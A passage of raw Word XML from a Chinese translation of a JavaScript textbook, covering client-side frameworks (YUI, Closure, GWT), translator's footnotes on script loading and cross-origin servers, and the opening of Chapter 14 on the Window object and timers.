        <w:t>）是一个大型的框架，它宣称自己</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>深不可测</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。它包含一个种类繁多的</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>组件集合、包管理系统、数据抽象层等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>YUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>YUI</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>http://developer.yahoo.com/yui/</w:t>
      </w:r>
      <w:r>
        <w:t>）是</w:t>
      </w:r>
      <w:r>
        <w:t>Yahoo!</w:t>
      </w:r>
      <w:r>
        <w:t>使用的一个著名框架，是</w:t>
      </w:r>
      <w:r>
        <w:t>Yahoo!</w:t>
      </w:r>
      <w:r>
        <w:t>的工程师团队开发的，已经应用在包含</w:t>
      </w:r>
      <w:r>
        <w:t>Yahoo!</w:t>
      </w:r>
      <w:r>
        <w:t>主页在内的诸多项目中。</w:t>
      </w:r>
      <w:r>
        <w:t>YUI</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Dojo</w:t>
      </w:r>
      <w:r>
        <w:t>一样庞大，是一个无所不包的类库，包括语言工具、</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>工具，</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>组件等。目前已经有两个不兼容版本的</w:t>
      </w:r>
      <w:r>
        <w:t>YUI</w:t>
      </w:r>
      <w:r>
        <w:t>存在，分别为</w:t>
      </w:r>
      <w:r>
        <w:t>YUI 2</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>YUI 3</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Closure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Closure</w:t>
      </w:r>
      <w:r>
        <w:t>类库（</w:t>
      </w:r>
      <w:r>
        <w:t>http://code.google.com/closure/library/</w:t>
      </w:r>
      <w:r>
        <w:t>）是</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>应用于</w:t>
      </w:r>
      <w:r>
        <w:t>Gmail</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Google Doc</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>和其他</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用的客户端类库。这个类库是打算和</w:t>
      </w:r>
      <w:r>
        <w:t>Closure</w:t>
      </w:r>
      <w:r>
        <w:t>编译器（</w:t>
      </w:r>
      <w:r>
        <w:t>http://code.google.com/closure/compiler/</w:t>
      </w:r>
      <w:r>
        <w:t>）配合使用的，剔除没有用的类库函数。因为没有用的代码会在部署之前被移除，</w:t>
      </w:r>
      <w:r>
        <w:t>Closure</w:t>
      </w:r>
      <w:r>
        <w:t>类库的设计者不需要保持特性集合的紧凑，所以</w:t>
      </w:r>
      <w:r>
        <w:t>Closure</w:t>
      </w:r>
      <w:r>
        <w:t>包含一个庞大的实用工具集。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>GWT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>GWT</w:t>
      </w:r>
      <w:r>
        <w:t>，即</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Google Web </w:t>
      </w:r>
      <w:r>
        <w:t>Toolkit</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>http://code.google.com/webtoolkit/</w:t>
      </w:r>
      <w:r>
        <w:t>），是一个完全不同类型的客户端框架。它用</w:t>
      </w:r>
      <w:r>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用接口，并提供编译器，将</w:t>
      </w:r>
      <w:r>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r>
        <w:t>程序翻译成兼容的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>GWT</w:t>
      </w:r>
      <w:r>
        <w:t>在一些</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>产品中使用，但是不如它们自己的</w:t>
      </w:r>
      <w:r>
        <w:t>Closure</w:t>
      </w:r>
      <w:r>
        <w:t>类库使用得那么广泛。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单提交的方式和服务器端</w:t>
      </w:r>
      <w:r>
        <w:t>CGI</w:t>
      </w:r>
      <w:r>
        <w:t>脚本进行通信的交互式</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面，是原始的</w:t>
      </w:r>
      <w:r>
        <w:t>“Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，可以不用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>来实现。但是，我们不会在本书中讨论这种</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用类型。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>Un</w:t>
      </w:r>
      <w:r>
        <w:t>obtrusive JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是一种将</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>结构中抽离的设计概念，避免在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签中夹杂一堆</w:t>
      </w:r>
      <w:r>
        <w:t>onchange</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>等属性去挂载</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>事件，让</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>Javascript</w:t>
      </w:r>
      <w:r>
        <w:t>分离，依</w:t>
      </w:r>
      <w:r>
        <w:t>MVC</w:t>
      </w:r>
      <w:r>
        <w:t>的原则将功能权责区分清楚，使</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>也变得结构化容易阅读。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>有时我们会看到诸如这种代码：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script src="core.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">config={...}; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t>看起来这段代码定义了一些配置项，由</w:t>
      </w:r>
      <w:r>
        <w:t>core.js</w:t>
      </w:r>
      <w:r>
        <w:t>来读取，这是一种将页</w:t>
      </w:r>
      <w:r>
        <w:t>面参数传入库文件的方法，在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>库的开发中非常常见，其中＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞之间的代码是一段纯文本，在</w:t>
      </w:r>
      <w:r>
        <w:t>core.js</w:t>
      </w:r>
      <w:r>
        <w:t>执行时读取这段文本然后动态执行一次，浏览器不会自动执行＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签之间的代码。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>这些类库文件通常放在</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>提供的</w:t>
      </w:r>
      <w:r>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:t>上。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>Steven Souder</w:t>
      </w:r>
      <w:r>
        <w:t>著名的</w:t>
      </w:r>
      <w:r>
        <w:t>ControlJS</w:t>
      </w:r>
      <w:r>
        <w:t>框架就是利用了</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>元素的这一特性来控制</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码的执行，更多信息请阅读：</w:t>
      </w:r>
      <w:r>
        <w:t>http://stevesouders.com/controljs/</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>作者在这里的表述很模糊，所谓</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>不会出现在浏览器中</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是指文档的文本内容已经载入，但是并未被浏览器引擎解析为</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>树，而</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>树的生成是受</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码执行的影响的，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码会</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>阻塞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>页面</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>的渲染。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>某些浏览器能够防范拒绝服务攻击和偶然的无限循环，如果脚本或事件处理程序运行时间太长，它会提示用户。这就给用户一个选择中止运行脚本的机会。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>值得微软称赞的是，</w:t>
      </w:r>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>现在同时支持＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素和</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:t>2011</w:t>
      </w:r>
      <w:r>
        <w:t>年第四季度的统计，</w:t>
      </w:r>
      <w:r>
        <w:t>Yahoo!</w:t>
      </w:r>
      <w:r>
        <w:t>已经不再将浏览器划分为</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>级和</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>级，而是统一给出一个测试基准，根据这次更新，可以明显感觉到测试基准向移动终端倾斜。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="332" w:name="_10_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="332"/>
      <w:r>
        <w:t>作者在这里的提示非常重要，我们不能基于浏览器写出一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，网络中的浏览器和浏览器之间无法直接进行通信。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="333" w:name="_11_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="333"/>
      <w:r>
        <w:t>严格讲这些服务器来自于不同的域、端口或协议，更详细内容请参照</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="334" w:name="Di_14Zhang__WindowDui_Xiang_____Di_13Zha"/>
      <w:bookmarkStart w:id="335" w:name="Di_14Zhang__WindowDui_Xiang_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="334"/>
      <w:bookmarkEnd w:id="335"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象及其在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中所扮演的核心角色：它是客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序的全局对象。本章</w:t>
      </w:r>
      <w:r>
        <w:t>介绍</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性和方法，这些属性定义了许多不同的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，但是只有一部分实际上和浏览器窗口相关。</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象是以窗口命名的。本章介绍以下方面：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·14.1</w:t>
      </w:r>
      <w:r>
        <w:t>节展示如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>来注册一个函数，并在指定的时间后调用它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·14.2</w:t>
      </w:r>
      <w:r>
        <w:t>节讲解如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性来获取当前显示文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>和载入新的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·14.3</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍</w:t>
      </w:r>
      <w:r>
        <w:t>history</w:t>
      </w:r>
      <w:r>
        <w:t>属性，并展示如何在历史记录中向前和向后移动。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·14.4</w:t>
      </w:r>
      <w:r>
        <w:t>节展示如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>navigator</w:t>
      </w:r>
      <w:r>
        <w:t>属性来获取浏览器厂商和版本信息，</w:t>
      </w:r>
      <w:r>
        <w:t>以及如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>screen</w:t>
      </w:r>
      <w:r>
        <w:t>属性来查询窗口尺寸。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·14.5</w:t>
      </w:r>
      <w:r>
        <w:t>节展示如何用</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>prompt()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>confirm()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来显示简单的文本对话框，以及如何用</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>对话框。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·14.6</w:t>
      </w:r>
      <w:r>
        <w:t>节讲解如何注册</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>处理方法，这个方法在未捕获的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>异常发生时调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·14.7</w:t>
      </w:r>
      <w:r>
        <w:t>节讲解</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性来使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·14.8</w:t>
      </w:r>
      <w:r>
        <w:t>节是一个很长的节，讲解如何打开和关闭浏览器窗口，以及如何编写可以在多个窗口和嵌套窗体中工作的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaSc</w:t>
      </w:r>
      <w:r>
        <w:t>ript</w:t>
      </w:r>
      <w:r>
        <w:t>代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="336" w:name="14_1_Ji_Shi_Qi_"/>
      <w:r>
        <w:t>14.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　计时器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="336"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>可以用来注册在指定的时间之后单次或重复调用的函数。因为它们都是客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中重要的全局函数，所以定义为</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法，但作为通用函数，其实不会对窗口做什么事情。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用来实现一个函数在指定的毫秒数之后运行。</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个值，这个值可以传递给</w:t>
      </w:r>
      <w:r>
        <w:t>clearTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>用于取消这个函数的执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>一样，只不过这个函数会在指定毫秒数的间隔里重复调用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setInterval(updateClock,60000);//</w:t>
